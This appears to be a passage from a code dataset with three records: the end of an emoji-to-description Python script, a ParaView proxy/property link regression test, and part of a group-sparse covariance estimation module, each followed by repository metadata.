🏴 Flag for Antananarivo (MG-T)
🏴 Flag for Cetinje (ME-06)
🏴 Flag for Bogdanci (MK-05)
🏴 Flag for Ulcinj (ME-20)
🏴 Flag for Kolašin (ME-09)
🏴 Flag for Bosilovo (MK-07)
🏴 Flag for Pljevlja (ME-14)
🏴 Flag for Telenești (MD-TE)
🏴 Flag for Bogovinje (MK-06)
🏴 Flag for Žabljak (ME-21)
🏴 Flag for Herceg Novi (ME-08)
🏴 Flag for Petnjica (ME-23)
🏴 Flag for Rožaje (ME-17)
🏴 Flag for Budva (ME-05)
🏴 Flag for Bar (ME-02)
🏴 Flag for Berovo (MK-03)
🏴 Flag for Tivat (ME-19)
🏴 Flag for Plužine (ME-15)
🏴 Flag for Kotor (ME-10)
🏴 Flag for Ralik Chain (MH-L)
🏴 Flag for Danilovgrad (ME-07)
🏴 Flag for Plav (ME-13)
🏴 Flag for Bitola (MK-04)
🏴 Flag for Bijelo Polje (ME-04)
🏴 Flag for Andrijevica (ME-01)
👩🏿👩🏿👦🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Nikšić (ME-12)
🏴 Flag for Taraclia (MD-TA)
🏴 Flag for Mojkovac (ME-11)
🏴 Flag for Mahajanga (MG-M)
🏴 Flag for Gusinje (ME-22)
🏴 Flag for Fianarantsoa (MG-F)
🏴 Flag for Šavnik (ME-18)
🏴 Flag for Podgorica (ME-16)
🏴 Flag for Toliara (MG-U)
🏴 Flag for Antsiranana (MG-D)
🏴 Flag for Kratovo (MK-43)
🏴 Flag for Kriva Palanka (MK-44)
🏴 Flag for Makedonski Brod (MK-52)
🏴 Flag for Jegunovce (MK-35)
🏴 Flag for Lozovo (MK-49)
🏴 Flag for Kumanovo (MK-47)
🏴 Flag for Vevčani (MK-12)
🏴 Flag for Demir Kapija (MK-24)
🏴 Flag for Vasilevo (MK-11)
🏴 Flag for Želino (MK-30)
🏴 Flag for Kavadarci (MK-36)
🏴 Flag for Zelenikovo (MK-32)
🏴 Flag for Konče (MK-41)
🏴 Flag for Vinica (MK-14)
🏴 Flag for Valandovo (MK-10)
🏴 Flag for Novaci (MK-55)
🏴 Flag for Novo Selo (MK-56)
🏴 Flag for Ilinden (MK-34)
🏴 Flag for Makedonska Kamenica (MK-51)
🏴 Flag for Vrapčište (MK-16)
🏴 Flag for Brvenica (MK-08)
🏴 Flag for Gradsko (MK-20)
🏴 Flag for Mavrovo and Rostuša (MK-50)
🏴 Flag for Debarca (MK-22)
🏴 Flag for Gostivar (MK-19)
🏴 Flag for Mogila (MK-53)
🏴 Flag for Lipkovo (MK-48)
🏴 Flag for Karbinci (MK-37)
🏴 Flag for Zrnovci (MK-33)
🏴 Flag for Negotino (MK-54)
🏴 Flag for Kičevo (MK-40)
🏴 Flag for Debar (MK-21)
🏴 Flag for Veles (MK-13)
🏴 Flag for Dojran (MK-26)
🏴 Flag for Gevgelija (MK-18)
🏴 Flag for Kočani (MK-42)
🏴 Flag for Krivogaštani (MK-45)
🏴 Flag for Delčevo (MK-23)
🏴 Flag for Kruševo (MK-46)
🏴 Flag for Čučer-Sandevo (MK-82)
🏴 Flag for Prilep (MK-62)
🏴 Flag for Centar Župa (MK-78)
🏴 Flag for Mandalay (MM-04)
🏴 Flag for Ségou (ML-4)
🏴 Flag for Petrovec (MK-59)
🏴 Flag for Češinovo-Obleševo (MK-81)
🏴 Flag for Kidal (ML-8)
🏴 Flag for Bago (MM-02)
🏴 Flag for Struga (MK-72)
🏴 Flag for Tearce (MK-75)
🏴 Flag for Studeničani (MK-74)
🏴 Flag for Ohrid (MK-58)
🏴 Flag for Sveti Nikole (MK-69)
🏴 Flag for Strumica (MK-73)
🏴 Flag for Sikasso (ML-3)
🏴 Flag for Kachin (MM-11)
🏴 Flag for Resen (MK-66)
🏴 Flag for Bamako (ML-BKO)
🏴 Flag for Magway (MM-03)
🏴 Flag for Sopište (MK-70)
🏴 Flag for Staro Nagoričane (MK-71)
🏴 Flag for Ayeyarwady (MM-07)
🏴 Flag for Gao (ML-7)
🏴 Flag for Mopti (ML-5)
🏴 Flag for Štip (MK-83)
🏴 Flag for Kayah (MM-12)
🏴 Flag for Tanintharyi (MM-05)
🏴 Flag for Koulikoro (ML-2)
🏴 Flag for Probištip (MK-63)
🏴 Flag for Pehčevo (MK-60)
🏴 Flag for Sagaing (MM-01)
🏴 Flag for Čaška (MK-80)
🏴 Flag for Rankovce (MK-65)
🏴 Flag for Yangon (MM-06)
🏴 Flag for Tetovo (MK-76)
🏴 Flag for Rosoman (MK-67)
🏴 Flag for Assaba (MR-03)
🏴 Flag for Shan (MM-17)
🏴 Flag for Rakhine (MM-16)
🏴 Flag for Khövsgöl (MN-041)
🏴 Flag for Bayan-Ölgii (MN-071)
🏴 Flag for Bayankhongor (MN-069)
🏴 Flag for Dornod (MN-061)
🏴 Flag for Selenge (MN-049)
🏴 Flag for Ulaanbaatar (MN-1)
🏴 Flag for Darkhan-Uul (MN-037)
🏴 Flag for Töv (MN-047)
🏴 Flag for Mon (MM-15)
🏴 Flag for Trarza (MR-06)
🏴 Flag for Sükhbaatar (MN-051)
🏴 Flag for Gorgol (MR-04)
🏴 Flag for Övörkhangai (MN-055)
🏴 Flag for Chin (MM-14)
🏴 Flag for Bulgan (MN-067)
🏴 Flag for Zavkhan (MN-057)
🏴 Flag for Dornogovi (MN-063)
🏴 Flag for Ömnögovi (MN-053)
🏴 Flag for Kayin (MM-13)
🏴 Flag for Govi-Altai (MN-065)
🏴 Flag for Tiris Zemmour (MR-11)
🏴 Flag for Dundgovi (MN-059)
🏴 Flag for Arkhangai (MN-073)
🏴 Flag for Tagant (MR-09)
🏴 Flag for Khovd (MN-043)
🏴 Flag for Uvs (MN-046)
🏴 Flag for Govisümber (MN-064)
🏴 Flag for Brakna (MR-05)
🏴 Flag for Dakhlet Nouadhibou (MR-08)
🏴 Flag for Hodh Ech Chargui (MR-01)
🏴 Flag for Orkhon (MN-035)
🏴 Flag for Hodh El Gharbi (MR-02)
🏴 Flag for Naypyidaw (MM-18)
🏴 Flag for Adrar (MR-07)
🏴 Flag for Inchiri (MR-12)
🏴 Flag for Iklin (MT-19)
🏴 Flag for Għarb (MT-14)
🏴 Flag for Mqabba (MT-33)
🏴 Flag for Kerċem (MT-22)
🏴 Flag for Għasri (MT-16)
🏴 Flag for Lija (MT-24)
🏴 Flag for Birżebbuġa (MT-05)
🏴 Flag for Birkirkara (MT-04)
🏴 Flag for Mġarr (MT-31)
🏴 Flag for Balzan (MT-02)
🏴 Flag for Munxar (MT-36)
🏴 Flag for Għajnsielem (MT-13)
🏴 Flag for Naxxar (MT-38)
🏴 Flag for Floriana (MT-09)
🏴 Flag for Marsa (MT-26)
🏴 Flag for Dingli (MT-07)
🏴 Flag for Gudja (MT-11)
🏴 Flag for Kirkop (MT-23)
🏴 Flag for Marsaskala (MT-27)
🏴 Flag for Paola (MT-39)
🏴 Flag for Fontana (MT-10)
🏴 Flag for Msida (MT-34)
🏴 Flag for Nadur (MT-37)
🏴 Flag for Mosta (MT-32)
🏴 Flag for Imtarfa (MT-35)
🏴 Flag for Cospicua (MT-06)
🏴 Flag for Birgu (MT-03)
🏴 Flag for Nouakchott Nord (MR-14)
🏴 Flag for Gżira (MT-12)
🏴 Flag for Mellieħa (MT-30)
🏴 Flag for Għaxaq (MT-17)
🏴 Flag for Ħamrun (MT-18)
🏴 Flag for Fgura (MT-08)
🏴 Flag for Attard (MT-01)
🏴 Flag for Għargħur (MT-15)
🏴 Flag for Kalkara (MT-21)
🏴 Flag for Nouakchott Sud (MR-15)
🏴 Flag for Marsaxlokk (MT-28)
🏴 Flag for Victoria (MT-45)
🏴 Flag for Qala (MT-42)
🏴 Flag for Żabbar (MT-64)
🏴 Flag for Agaléga (MU-AG)
🏴 Flag for Ta’ Xbiex (MT-58)
🏴 Flag for Pietà (MT-41)
🏴 Flag for Sannat (MT-52)
🏴 Flag for Port Louis District (MU-PL)
🏴 Flag for Xagħra (MT-61)
🏴 Flag for Rivière Noire (MU-BL)
🏴 Flag for Sliema (MT-56)
🏴 Flag for Safi (MT-47)
🏴 Flag for Flacq (MU-FL)
🏴 Flag for Pembroke (MT-40)
🏴 Flag for Swieqi (MT-57)
🏴 Flag for Curepipe (MU-CU)
🏴 Flag for Żurrieq (MT-68)
🏴 Flag for San Ġwann (MT-49)
🏴 Flag for Grand Port (MU-GP)
🏴 Flag for Cargados Carajos (MU-CC)
🏴 Flag for Qrendi (MT-44)
🏴 Flag for Valletta (MT-60)
🏴 Flag for Pamplemousses (MU-PA)
🏴 Flag for Qormi (MT-43)
🏴 Flag for Port Louis (MU-PU)
🏴 Flag for Tarxien (MT-59)
🏴 Flag for Żebbuġ Gozo (MT-65)
🏴 Flag for Saint Lawrence (MT-50)
🏴 Flag for Żejtun (MT-67)
🏴 Flag for St. Paul’s Bay (MT-51)
🏴 Flag for Santa Luċija (MT-53)
🏴 Flag for Żebbuġ (MT-66)
🏴 Flag for Rabat (MT-46)
🏴 Flag for Siġġiewi (MT-55)
👩🏽👩🏽👧🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Santa Venera (MT-54)
🏴 Flag for Xgħajra (MT-63)
🏴 Flag for Moka (MU-MO)
🏴 Flag for Michoacán (MX-MIC)
🏴 Flag for Northern (MW-N)
🏴 Flag for Upper North Province (MV-UN)
🏴 Flag for Colima (MX-COL)
🏴 Flag for Rodrigues (MU-RO)
🏴 Flag for Guanajuato (MX-GUA)
🏴 Flag for Ciudad de Mexico (MX-CMX)
🏴 Flag for Puebla (MX-PUE)
🏴 Flag for Quatre Bornes (MU-QB)
🏴 Flag for Oaxaca (MX-OAX)
🏴 Flag for Central (MW-C)
🏴 Flag for Savanne (MU-SA)
🏴 Flag for Morelos (MX-MOR)
🏴 Flag for Hidalgo (MX-HID)
🏴 Flag for Aguascalientes (MX-AGU)
🏴 Flag for Campeche (MX-CAM)
🏴 Flag for Nuevo León (MX-NLE)
🏴 Flag for Malé (MV-MLE)
🏴 Flag for Guerrero (MX-GRO)
🏴 Flag for Vacoas-Phoenix (MU-VP)
👨🏻👨🏻👦🏻👧🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for North Central Province (MV-NC)
🏴 Flag for Mexico State (MX-MEX)
🏴 Flag for Plaines Wilhems (MU-PW)
🏴 Flag for Central Province (MV-CE)
🏴 Flag for Coahuila (MX-COA)
🏴 Flag for South Province (MV-SU)
🏴 Flag for Chiapas (MX-CHP)
🏴 Flag for Southern (MW-S)
🏴 Flag for Sofala (MZ-S)
🏴 Flag for Perlis (MY-09)
🏴 Flag for Veracruz (MX-VER)
🏴 Flag for Sarawak (MY-13)
🏴 Flag for Kelantan (MY-03)
🏴 Flag for Zambezi (NA-CA)
🏴 Flag for Manica (MZ-B)
🏴 Flag for Labuan (MY-15)
🏴 Flag for Cabo Delgado (MZ-P)
🏴 Flag for Hardap (NA-HA)
🏴 Flag for Tete (MZ-T)
🏴 Flag for Kedah (MY-02)
🏴 Flag for Pahang (MY-06)
🏴 Flag for Penang (MY-07)
🏴 Flag for Perak (MY-08)
🏴 Flag for Maputo Province (MZ-L)
🏴 Flag for Goiás (BR-GO)
🏴 Flag for Terengganu (MY-11)
🏴 Flag for Inhambane (MZ-I)
🏴 Flag for Malacca (MY-04)
🏴 Flag for Erongo (NA-ER)
🏴 Flag for Tlaxcala (MX-TLA)
🏴 Flag for Negeri Sembilan (MY-05)
🏴 Flag for Zacatecas (MX-ZAC)
🏴 Flag for Tamaulipas (MX-TAM)
🏴 Flag for Niassa (MZ-A)
🏴 Flag for Maputo (MZ-MPM)
🏴 Flag for Nampula (MZ-N)
🏴 Flag for Putrajaya (MY-16)
🏴 Flag for Sinaloa (MX-SIN)
🏴 Flag for Yucatán (MX-YUC)
🏴 Flag for Sabah (MY-12)
👩🏼👩🏼👧🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Zambezia (MZ-Q)
🏴 Flag for Querétaro (MX-QUE)
🏴 Flag for Gaza (MZ-G)
🏴 Flag for Otjozondjupa (NA-OD)
🏴 Flag for Maradi (NE-4)
🏴 Flag for Kunene (NA-KU)
🏴 Flag for Akwa Ibom (NG-AK)
🏴 Flag for Tahoua (NE-5)
🏴 Flag for Rivière du Rempart (MU-RR)
🏴 Flag for Imo (NG-IM)
🏴 Flag for Katsina (NG-KT)
🏴 Flag for Dosso (NE-3)
🏴 Flag for Tillabéri (NE-6)
🏴 Flag for Ekiti (NG-EK)
🏴 Flag for Omaheke (NA-OH)
🏴 Flag for Bauchi (NG-BA)
🏴 Flag for Karas (NA-KA)
🏴 Flag for Bayelsa (NG-BY)
🏴 Flag for Ohangwena (NA-OW)
🏴 Flag for Benue (NG-BE)
🏴 Flag for Enugu (NG-EN)
🏴 Flag for Oshana (NA-ON)
🏴 Flag for Kaduna (NG-KD)
👨🏻👶🏻👦🏻 Family - Man: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Kebbi (NG-KE)
🏴 Flag for Jigawa (NG-JI)
🏴 Flag for Niamey (NE-8)
🏴 Flag for Anambra (NG-AN)
🏴 Flag for Gombe (NG-GO)
🏴 Flag for Agadez (NE-1)
🏴 Flag for Khomas (NA-KH)
🏴 Flag for Diffa (NE-2)
🏴 Flag for Johor (MY-01)
🏴 Flag for Kano (NG-KN)
🏴 Flag for Omusati (NA-OS)
🏴 Flag for Kogi (NG-KO)
🏴 Flag for Edo (NG-ED)
🏴 Flag for Abia (NG-AB)
🏴 Flag for Oshikoto (NA-OT)
🏴 Flag for Kavango West (NA-KW)
🏴 Flag for Ebonyi (NG-EB)
🏴 Flag for Zinder (NE-7)
🏴 Flag for Jinotega (NI-JI)
🏴 Flag for Nasarawa (NG-NA)
🏴 Flag for Friesland (NL-FR)
🏴 Flag for Sokoto (NG-SO)
🏴 Flag for Rivas (NI-RI)
🏴 Flag for Nueva Segovia (NI-NS)
🏴 Flag for Plateau (NG-PL)
🏴 Flag for Yobe (NG-YO)
🏴 Flag for Bonaire (NL-BQ1)
🏴 Flag for Atlántico Norte (NI-AN)
🏴 Flag for Zamfara (NG-ZA)
🏴 Flag for Gelderland (NL-GE)
🏴 Flag for Oyo (NG-OY)
🏴 Flag for Madriz (NI-MD)
🏴 Flag for Chinandega (NI-CI)
🏴 Flag for Ondo (NG-ON)
👨🏽👨🏽👦🏽👧🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for North Rhine-Westphalia (DE-NW)
🏴 Flag for Lagos (NG-LA)
🏴 Flag for Managua (NI-MN)
🏴 Flag for Atlántico Sur (NI-AS)
🏴 Flag for Curaçao (NL-CW)
🏴 Flag for Boaco (NI-BO)
🏴 Flag for Rivers (NG-RI)
🏴 Flag for Granada (NI-GR)
🏴 Flag for Chontales (NI-CO)
🏴 Flag for Groningen (NL-GR)
🏴 Flag for Sint Eustatius (NL-BQ3)
🏴 Flag for Río San Juan (NI-SJ)
🏴 Flag for Osun (NG-OS)
🏴 Flag for Taraba (NG-TA)
🏴 Flag for Flevoland (NL-FL)
🏴 Flag for Matagalpa (NI-MT)
🏴 Flag for Drenthe (NL-DR)
🏴 Flag for Carazo (NI-CA)
🏴 Flag for Kwara (NG-KW)
🏴 Flag for Niger (NG-NI)
🏴 Flag for Estelí (NI-ES)
🏴 Flag for South Holland (NL-ZH)
"""
for line in emojis.splitlines():
    words = line.split()
    if not words:
        continue  # skip blank lines in the emoji table
    char = words[0]
    desc = " ".join(words[1:])
    print("{}\t:{}".format(desc, char))
|
SilverWingedSeraph/sws-dotfiles
|
scripts/emoji-to-scl.py
|
Python
|
apache-2.0
| 358,856
|
[
"CRYSTAL",
"EPW",
"FLEUR",
"Octopus"
] |
dd727bd718039420e8b80f07f0a7b7a98f2d44e3bf4cbb6a21d399f244b98457
|
# Tests links between proxies and properties.
import os
import os.path
import sys
from paraview import servermanager
from paraview import smtesting
smtesting.ProcessCommandLineArguments()
servermanager.Connect()
pvsm_file = os.path.join(smtesting.SMStatesDir, "ProxyPropertyLinks.pvsm")
print "State file: %s" % pvsm_file
smtesting.LoadServerManagerState(pvsm_file)
pxm = servermanager.ProxyManager()
sphere1 = pxm.GetProxy("sources", "Sphere1")
sphere2 = pxm.GetProxy("sources", "Sphere2")
sphere3 = pxm.GetProxy("sources", "Sphere3")
# Create links.
proxyLink = servermanager.vtkSMProxyLink()
proxyLink.AddLinkedProxy(sphere1.SMProxy, 1) # Input
proxyLink.AddLinkedProxy(sphere2.SMProxy, 2) # Output
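# Note: in AddLinkedProxy the second argument is the link direction; the
# values used here (1 = input, 2 = output) follow the vtkSMLink convention,
# as the inline comments above indicate.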
pxm.RegisterLink("MyProxyLink", proxyLink)
proxyLink = None
propertyLink = servermanager.vtkSMPropertyLink()
propertyLink.AddLinkedProperty(sphere3.SMProxy, "EndTheta", 1) # Input.
propertyLink.AddLinkedProperty(sphere1.SMProxy, "StartTheta", 2) # Output.
pxm.RegisterLink("MyPropertyLink", propertyLink)
propertyLink = None
temp_state = os.path.join(smtesting.TempDir,"links_temp.pvsm")
pxm.SaveState(temp_state)
sphere1 = None
sphere2 = None
sphere3 = None
pxm.UnRegisterProxies()
pxm.UnRegisterAllLinks()
# Load the saved state which also has the links.
smtesting.LoadServerManagerState(temp_state)
try:
    os.remove(temp_state)
except OSError:
    pass
sphere1 = pxm.GetProxy("sources", "Sphere1")
sphere2 = pxm.GetProxy("sources", "Sphere2")
sphere3 = pxm.GetProxy("sources", "Sphere3")
# Do some changes.
sphere1.GetProperty("StartPhi").SetElement(0, 25)
sphere1.UpdateVTKObjects()
sphere3.GetProperty("EndTheta").SetElement(0, 100)
sphere3.GetProperty("ThetaResolution").SetElement(0, 10)
sphere3.GetProperty("PhiResolution").SetElement(0, 10)
sphere3.UpdateVTKObjects()
rmProxy = servermanager.GetRenderView()
rmProxy.StillRender()
if not smtesting.DoRegressionTesting():
# This will lead to VTK object leaks.
sys.exit(1)
|
HopeFOAM/HopeFOAM
|
ThirdParty-0.1/ParaView-5.0.1/ParaViewCore/ServerManager/Default/Testing/Python/ProxyPropertyLinks.py
|
Python
|
gpl-3.0
| 1,944
|
[
"ParaView",
"VTK"
] |
183743f20bfcfd53a48c69ca2c8cd4cec3ed90085b132b1a46dc3ca0123ead1f
|
"""
Implementation of algorithm for sparse multi-subjects learning of Gaussian
graphical models.
"""
# Authors: Philippe Gervais
# License: simplified BSD
import warnings
import collections
import operator
import itertools
import numpy as np
import scipy.linalg
import sklearn.cross_validation
import sklearn.covariance
from sklearn.utils.extmath import fast_logdet
from sklearn.covariance import empirical_covariance
from sklearn.base import BaseEstimator
from sklearn.externals.joblib import Memory, delayed, Parallel
from ._utils import CacheMixin
from ._utils import logger
from ._utils.testing import is_spd
def compute_alpha_max(emp_covs, n_samples):
"""Compute the critical value of the regularization parameter.
    Above this value, the precision matrices computed by
    group_sparse_covariance are diagonal (complete sparsity).
    This function also returns the value below which the precision
    matrices are fully dense (i.e. have the minimal number of zero
    coefficients).
Parameters
----------
emp_covs : array-like, shape (n_features, n_features, n_subjects)
covariance matrix for each subject.
n_samples : array-like, shape (n_subjects,)
number of samples used in the computation of every covariance matrix.
n_samples.sum() can be arbitrary.
Returns
-------
alpha_max : float
minimal value for the regularization parameter that gives a
fully sparse matrix.
alpha_min : float
minimal value for the regularization parameter that gives a fully
dense matrix.
See also
--------
The formula used in this function was derived using the same method as in:
Duchi, John, Stephen Gould, and Daphne Koller. 'Projected Subgradient
Methods for Learning Sparse Gaussians'. ArXiv E-prints 1206 (1 June
2012): 3249.
"""
A = np.copy(emp_covs)
n_samples = np.asarray(n_samples).copy()
n_samples /= n_samples.sum()
for k in range(emp_covs.shape[-1]):
# Set diagonal to zero
A[..., k].flat[::A.shape[0] + 1] = 0
A[..., k] *= n_samples[k]
norms = np.sqrt((A ** 2).sum(axis=-1))
return np.max(norms), np.min(norms[norms > 0])
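# A hedged usage sketch (not part of the original module): builds random
# positive semi-definite "covariances" for two hypothetical subjects and
# prints the regularization bounds. All names and values are invented.
def _example_compute_alpha_max():
    rand_gen = np.random.RandomState(0)
    n_features, n_subjects = 5, 2
    emp_covs = np.empty((n_features, n_features, n_subjects))
    for k in range(n_subjects):
        signals = rand_gen.randn(30, n_features)  # 30 samples per subject
        emp_covs[..., k] = np.dot(signals.T, signals) / 30.
    # Floats avoid integer division when n_samples is normalized in-place.
    alpha_max, alpha_min = compute_alpha_max(emp_covs, n_samples=[30., 30.])
    print("fully sparse above %.3f, fully dense below %.3f"
          % (alpha_max, alpha_min))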
def _update_submatrix(full, sub, sub_inv, p, h, v):
"""Update submatrix and its inverse.
    On entry, sub_inv is the inverse of the submatrix of "full" obtained by
    removing the (p-1)-th row and column.
    sub and sub_inv are modified in-place. After execution of this function,
    sub_inv contains the inverse of the submatrix of "full" obtained by
    removing the p-th row and column.
    This computation is based on the Sherman-Morrison-Woodbury identity.
"""
n = p - 1
v[:n + 1] = full[:n + 1, n]
v[n + 1:] = full[n + 2:, n]
h[:n + 1] = full[n, :n + 1]
h[n + 1:] = full[n, n + 2:]
# change row: first usage of SWM identity
coln = sub_inv[:, n:n + 1] # 2d array, useful for sub_inv below
V = h - sub[n, :]
coln = coln / (1. + np.dot(V, coln))
# The following line is equivalent to
# sub_inv -= np.outer(coln, np.dot(V, sub_inv))
sub_inv -= np.dot(coln, np.dot(V, sub_inv)[np.newaxis, :])
sub[n, :] = h
# change column: second usage of SWM identity
rown = sub_inv[n:n + 1, :] # 2d array, useful for sub_inv below
U = v - sub[:, n]
rown = rown / (1. + np.dot(rown, U))
# The following line is equivalent to (but faster)
# sub_inv -= np.outer(np.dot(sub_inv, U), rown)
sub_inv -= np.dot(np.dot(sub_inv, U)[:, np.newaxis], rown)
    sub[:, n] = v  # equivalent to sub[:, n] += U
# Make sub_inv symmetric (overcome some numerical limitations)
sub_inv += sub_inv.T.copy()
sub_inv /= 2.
def _assert_submatrix(full, sub, n):
"""Check that "sub" is the matrix obtained by removing the p-th col and row
in "full". Used only for debugging.
"""
true_sub = np.empty_like(sub)
true_sub[:n, :n] = full[:n, :n]
true_sub[n:, n:] = full[n + 1:, n + 1:]
true_sub[:n, n:] = full[:n, n + 1:]
true_sub[n:, :n] = full[n + 1:, :n]
np.testing.assert_almost_equal(true_sub, sub)
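# A hedged numeric check (not in the original module): verifies the rank-one
# submatrix updates above against the direct construction on a small random
# SPD matrix. All values are invented for illustration.
def _example_update_submatrix():
    rand_gen = np.random.RandomState(5)
    m = rand_gen.randn(6, 6)
    full = np.dot(m, m.T) + 6 * np.eye(6)  # symmetric, well conditioned
    sub = full[1:, 1:].copy()              # row/column 0 removed initially
    sub_inv = scipy.linalg.inv(sub)
    h = np.empty(5)
    v = np.empty(5)
    for p in range(1, 6):
        _update_submatrix(full, sub, sub_inv, p, h, v)
        _assert_submatrix(full, sub, p)    # sub now excludes row/column p
        np.testing.assert_almost_equal(np.dot(sub, sub_inv), np.eye(5),
                                       decimal=8)
    print("submatrix updates verified")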
def group_sparse_covariance(subjects, alpha, max_iter=50, tol=1e-3, verbose=0,
probe_function=None, precisions_init=None,
debug=False):
"""Compute sparse precision matrices and covariance matrices.
The precision matrices returned by this function are sparse, and share a
common sparsity pattern: all have zeros at the same location. This is
achieved by simultaneous computation of all precision matrices at the
same time.
    Running time is linear in max_iter and in the number of subjects
    (len(subjects)), but cubic in the number of features
    (subjects[0].shape[1]).
Parameters
==========
subjects : list of numpy.ndarray
input subjects. Each subject is a 2D array, whose columns contain
signals. Each array shape must be (sample number, feature number).
The sample number can vary from subject to subject, but all subjects
must have the same number of features (i.e. of columns).
alpha : float
        regularization parameter. With normalized covariance matrices and
        numbers of samples, sensible values lie in the [0, 1] range (zero
        means no regularization: the output is not sparse).
max_iter : int, optional
maximum number of iterations.
tol : positive float or None, optional
The tolerance to declare convergence: if the duality gap goes below
this value, optimization is stopped. If None, no check is performed.
verbose : int, optional
verbosity level. Zero means "no message".
probe_function : callable or None
This value is called before the first iteration and after each
iteration. If it returns True, then optimization is stopped
prematurely.
The function is given as arguments (in that order):
- empirical covariances (ndarray),
- number of samples for each subject (ndarray),
- regularization parameter (float)
- maximum iteration number (integer)
- tolerance (float)
- current iteration number (integer). -1 means "before first iteration"
- current value of precisions (ndarray).
- previous value of precisions (ndarray). None before first iteration.
precisions_init: numpy.ndarray
initial value of the precision matrices. If not provided, a diagonal
matrix with the variances of each input signal is used.
debug : bool, optional
if True, perform checks during computation. It can help find
numerical problems, but increases computation time a lot.
Returns
=======
emp_covs : numpy.ndarray, shape (n_features, n_features, n_subjects)
empirical covariances matrices
precisions : numpy.ndarray, shape (n_features, n_features, n_subjects)
estimated precision matrices
Notes
=====
The present algorithm is based on:
Jean Honorio and Dimitris Samaras.
"Simultaneous and Group-Sparse Multi-Task Learning of Gaussian Graphical
Models". arXiv:1207.4255 (17 July 2012). http://arxiv.org/abs/1207.4255.
"""
emp_covs, n_samples = empirical_covariances(
subjects, assume_centered=False)
precisions = _group_sparse_covariance(
emp_covs, n_samples, alpha, max_iter=max_iter, tol=tol,
verbose=verbose, precisions_init=precisions_init,
probe_function=probe_function, debug=debug)
return emp_covs, precisions
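# A hedged usage sketch (not part of the original module). Subject arrays and
# parameter values are invented; the small max_iter keeps the run cheap and
# may trigger the "maximum number of iterations" warning.
def _example_group_sparse_covariance():
    rand_gen = np.random.RandomState(42)
    subjects = [rand_gen.randn(40, 6), rand_gen.randn(50, 6)]
    emp_covs, precisions = group_sparse_covariance(
        subjects, alpha=0.1, max_iter=5, tol=1e-2, verbose=0)
    # One (n_features, n_features) matrix per subject, stacked on the last
    # axis: both shapes are (6, 6, 2).
    print("%s %s" % (emp_covs.shape, precisions.shape))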
def _group_sparse_covariance(emp_covs, n_samples, alpha, max_iter=10, tol=1e-3,
precisions_init=None, probe_function=None,
verbose=0, debug=False):
"""Internal version of group_sparse_covariance.
See its docstring for details.
"""
if tol == -1:
tol = None
    if not isinstance(alpha, (int, float)) or alpha < 0:
        raise ValueError("Regularization parameter alpha must be a "
                         "non-negative number.\n"
                         "You provided: {0}".format(str(alpha)))
n_subjects = emp_covs.shape[-1]
n_features = emp_covs[0].shape[0]
n_samples = np.asarray(n_samples)
n_samples /= n_samples.sum() # essential for numerical stability
# Check diagonal normalization.
ones = np.ones(emp_covs.shape[0])
for k in range(n_subjects):
if (abs(emp_covs[..., k].flat[::emp_covs.shape[0] + 1] - ones)
> 0.1).any():
warnings.warn("input signals do not all have unit variance. This "
"can lead to numerical instability.")
break
if precisions_init is None:
        # Fortran order makes omega[..., k] contiguous, which is often useful.
omega = np.ndarray(shape=emp_covs.shape, dtype=np.float,
order="F")
for k in range(n_subjects):
            # Values on main diagonals are far from zero, because they
            # are time series energies.
omega[..., k] = np.diag(1. / np.diag(emp_covs[..., k]))
else:
omega = precisions_init.copy()
# Preallocate arrays
y = np.ndarray(shape=(n_subjects, n_features - 1), dtype=np.float)
u = np.ndarray(shape=(n_subjects, n_features - 1), dtype=np.float)
y_1 = np.ndarray(shape=(n_subjects, n_features - 2), dtype=np.float)
h_12 = np.ndarray(shape=(n_subjects, n_features - 2), dtype=np.float)
q = np.ndarray(shape=(n_subjects,), dtype=np.float)
aq = np.ndarray(shape=(n_subjects,), dtype=np.float) # temp. array
c = np.ndarray(shape=(n_subjects,), dtype=np.float)
W = np.ndarray(shape=(omega.shape[0] - 1, omega.shape[1] - 1,
omega.shape[2]),
dtype=np.float, order="F")
W_inv = np.ndarray(shape=W.shape, dtype=np.float, order="F")
    # Auxiliary arrays.
v = np.ndarray((omega.shape[0] - 1,), dtype=np.float)
h = np.ndarray((omega.shape[1] - 1,), dtype=np.float)
# Optional.
tolerance_reached = False
max_norm = None
omega_old = np.empty_like(omega)
if probe_function is not None:
# iteration number -1 means called before iteration loop.
probe_function(emp_covs, n_samples, alpha, max_iter, tol,
-1, omega, None)
probe_interrupted = False
# Start optimization loop. Variables are named following (mostly) the
# Honorio-Samaras paper notations.
# Used in the innermost loop. Computed here to save some computation.
alpha2 = alpha ** 2
for n in xrange(max_iter):
if max_norm is not None:
suffix = (" variation (max norm): {max_norm:.3e} ".format(
max_norm=max_norm))
else:
suffix = ""
logger.log("* iteration {iter_n:d} ({percentage:.0f} %){suffix} ..."
"".format(iter_n=n, percentage=100. * n / max_iter,
suffix=suffix), verbose=verbose)
omega_old[...] = omega
for p in xrange(n_features):
if p == 0:
# Initial state: remove first col/row
W = omega[1:, 1:, :].copy() # stack of W(k)
W_inv = np.ndarray(shape=W.shape, dtype=np.float)
for k in xrange(W.shape[2]):
# stack of W^-1(k)
W_inv[..., k] = scipy.linalg.inv(W[..., k])
if debug:
np.testing.assert_almost_equal(
np.dot(W_inv[..., k], W[..., k]),
np.eye(W_inv[..., k].shape[0]), decimal=10)
_assert_submatrix(omega[..., k], W[..., k], p)
assert(is_spd(W_inv[..., k]))
else:
# Update W and W_inv
if debug:
omega_orig = omega.copy()
for k in range(n_subjects):
_update_submatrix(omega[..., k],
W[..., k], W_inv[..., k], p, h, v)
if debug:
_assert_submatrix(omega[..., k], W[..., k], p)
assert(is_spd(W_inv[..., k], decimal=14))
np.testing.assert_almost_equal(
np.dot(W[..., k], W_inv[..., k]),
np.eye(W_inv[..., k].shape[0]), decimal=10)
if debug:
# Check that omega has not been modified.
np.testing.assert_almost_equal(omega_orig, omega)
# In the following lines, implicit loop on k (subjects)
# Extract y and u
